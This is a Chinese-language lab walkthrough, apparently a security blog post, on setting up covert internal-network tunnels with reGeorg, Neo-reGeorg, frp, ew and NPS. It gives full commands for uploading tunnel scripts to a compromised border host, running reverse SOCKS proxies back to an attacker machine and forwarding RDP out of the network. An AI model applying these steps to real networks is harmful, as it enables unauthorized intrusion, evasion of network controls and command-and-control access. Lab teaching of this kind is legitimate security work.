別低頭,皇冠會掉;別流淚,賤人會笑。
本文首發于先知社區,原創作者即是本人
0x00 前言
構建內網隱蔽通道,從而突破各種安全策略限制,實現對目標服務器的完美控制。
當我們從外網成功獲得攻擊點的時候,通過反彈shell、端口轉發、內網穿透等技巧,來進一步入侵內網服務器。當我們取得內網目標服務器的控制權限,通過隧道技術繞過網絡限制,實現隱蔽C2服務器的通信。
網絡拓撲:
網絡配置IP如下:
攻擊機:
win10:192.168.1.6
kali:192.168.1.7靶場:
VM1:對外邊界服務器,win7
192.168.52.143
192.168.1.5VM2:域成員,2003
192.168.52.141VM3:域控,2008
192.168.52.138
0x01 reGeorge
1.1 環境
攻擊機kali
reGeorge軟件,下載:https://github.com/sensepost/reGeorg
運行程序需要的環境:
Python、pip、urllib3;
1.2 部署配置
上傳tunnel.nosocket.php
前提條件,已獲得跳板機的權限(都打到內網了,跳板機的權限肯定獲得了),server-bt系統的跳板機是php環境,將reGeorge中的tunnel.nosocket.php上傳至網站
并訪問http://192.168.1.5/tunnel.nosocket.php
訪問成功
啟動reGeorg
python reGeorgSocksProxy.py -p 1090 -u http://192.168.1.5/tunnel.nosocket.php
表示本地1090端口的流量都轉發給指定的那個url,1090是指定的監聽端口;
配置代理
然后配置proxychains代理鏈的配置文件vim /etc/proxychains.conf,將代理設置成本機的1090端口:socks5 127.0.0.1 1090
1.3 測試
命令前面加上proxychains 運行命令,(跳板機php環境已啟動,存在主頁index.php)
proxychains curl http://192.168.52.143
reGeorg控制端
0x02 Neo-reGeorg
1.1 使用
設置密碼并生成隧道文件,運行后會生成一個neoreg_server目錄,里面包含了各種語言類型的隧道文件
$ python3 neoreg.py generate -k <password>
[+] Create neoreg server files:=> neoreg_server/key.txt. # 密碼=> neoreg_server/tunnel.nosocket.php=> neoreg_server/tunnel.js=> neoreg_server/tunnel.php=> neoreg_server/tunnel.ashx=> neoreg_server/tunnel.aspx=> neoreg_server/tunnel.tomcat.5.jsp=> neoreg_server/tunnel.tomcat.5.jspx=> neoreg_server/tunnel.jsp=> neoreg_server/tunnel.jspx
python3 neoreg.py generate -k jdxyxd
1.2 部署配置
上傳tunnel.php
前提條件,已獲得跳板機的權限(都打到內網了,跳板機的權限肯定獲得了),server-bt系統的跳板機是php環境,將reGeorge中的tunnel.php上傳至網站
并訪問http://192.168.1.5/tunnel.php
訪問成功
啟動Neo-reGeorg
python3 neoreg.py -k jdxyxd -u http://192.168.1.5/tunnel.php #表示本地1080端口的流量都轉發給指定的那個url,1080是指定的監聽端口;
配置代理
然后配置proxychains代理鏈的配置文件vim /etc/proxychains.conf,將代理設置成本機的1080端口:socks5 127.0.0.1 1080
1.3 測試
命令前面加上proxychains 運行命令,(跳板機php環境已啟動,存在主頁index.php)
proxychains curl http://192.168.52.143
0x03 frp
軟件:frp_0.33.0_windows_amd64 ,frp_0.34.1_linux_amd64
代理工具Proxifier(windows下通常用可視化的proxifier、SocksCap64,Linux在proxychains設置)
1.1 攻擊機為windows環境
frp的Socks5反向代理:
(HTTP反向代理修改plugin模塊和proxifier代理類型即可)
攻擊機-服務端:
設置frps.ini
[common]
bind_port = 7000
然后運行
frps.exe -c frps.ini
跳板機-客戶端:server_addr為攻擊機IP
設置frpc.ini
[common]
server_addr = 192.168.1.6
server_port = 7000 [socks5]
type = tcp
remote_port = 8010
plugin = socks5
然后運行
frpc.exe -c frpc.ini
SwitchyOmega配置
瀏覽器訪問192.168.52.143 訪問成功
proxifier配置
瀏覽器訪問192.168.52.143 訪問成功
0x04 ew
1.1 攻擊機為kali環境
ew正向代理
1.正向連接跳板機在win7機器上執行(ew_for_windows上傳到跳板機)
ew_for_win_32.exe -s ssocksd -l 1090
這里還需要修改proxychains.conf配置文件
$ vim /etc/proxychains.conf socks5 192.168.1.5 1090
測試執行:
proxychains curl http://192.168.52.143/
ew反向代理
服務端-攻擊機kali
執行:
./ew_for_linux -s rcsocks -l 1080 -e 1024
客戶端-跳板機
執行
ew.exe -s rssocks -d 192.168.1.7 -e 1024
配置proxychains代理鏈
在配置文件/etc/proxychains.conf,
將代理設置成本機的1080端口(root用戶修改):
測試執行:
proxychains curl http://192.168.52.143/
0x05 NPS隱秘隧道搭建
1)建立連接
此場景攻擊機使用Kali,在攻擊機運行命令“./nps install”安裝服務端,如圖所示。
運行命令“nps start”啟動服務端,如圖所示。
通過8080端口訪問服務端的Web界面,如圖所示。
http://192.168.1.7:8080
輸入默認用戶名、密碼admin、123登錄,登錄后可以看到默認客戶端連接端口為8024,登錄后的Web界面如圖所示。
添加客戶端,如圖所示,配置唯一驗證密鑰,驗證密鑰在從客戶端連接到服務端時使用,此處配置為“any”,然后開啟壓縮和加密傳輸。
最后在邊界主機運行命令“npc.exe -server=192.168.1.7:8024 -vkey=any”來連接服務端,建立連接如圖所示。
連接成功后在攻擊機的Web界面可看到客戶端上線,如圖所示。
2)TCP隧道
客戶端上線后便可以通過Web界面單擊上線的客戶端、查看選項、配置隧道,例如,若想訪問內網主機的3389端口,則可通過TCP隧道將內網主機的3389端口映射到攻擊機的1111端口,單擊“新增”,配置目標“192.168.52.143:3389”,配置服務端口為“1111”,TCP隧道如圖所示。
TCP隧道建立成功后,即可通過連接攻擊機的1111端口來連接內網主機的遠程桌面,在攻擊機運行命令“rdesktop 192.168.1.7:1111”連接本地的1111端口,隧道的使用如圖所示。
3)SOCKS5代理
若想搭建HTTP代理或SOCKS代理,只需選擇對應模式,填寫服務端端口即可,以SOCKS為例,選擇模式為“SOCKS代理”,如圖所示,服務端端口為“1234”。
配置好SOCKS代理后,便可使用攻擊機192.168.1.7的1234端口訪問內網,配置代理服務器
訪問內網主機站點http://192.168.52.143/
使用代理如圖所示。
或者配置proxifier
訪問內網主機站點http://192.168.52.143/
文筆生疏,措辭淺薄,望各位大佬不吝賜教,萬分感謝。
免責聲明:由于傳播或利用此文所提供的信息、技術或方法而造成的任何直接或間接的后果及損失,均由使用者本人負責, 文章作者不為此承擔任何責任。
轉載聲明:各家興 擁有對此文章的修改和解釋權,如欲轉載或傳播此文章,必須保證此文章的完整性,包括版權聲明等全部內容。未經作者允許,不得任意修改或者增減此文章的內容,不得以任何方式將其用于商業目的。
CSDN:
https://blog.csdn.net/weixin_48899364?type=blog公眾號:
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect博客:
https://rdyx0.github.io/先知社區:
https://xz.aliyun.com/u/37846SecIN:
https://www.sec-in.com/author/3097FreeBuf:
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85
)
:構建簡單頁面)
)
)
——4.6.存儲過程和函數(Procedure和Function))
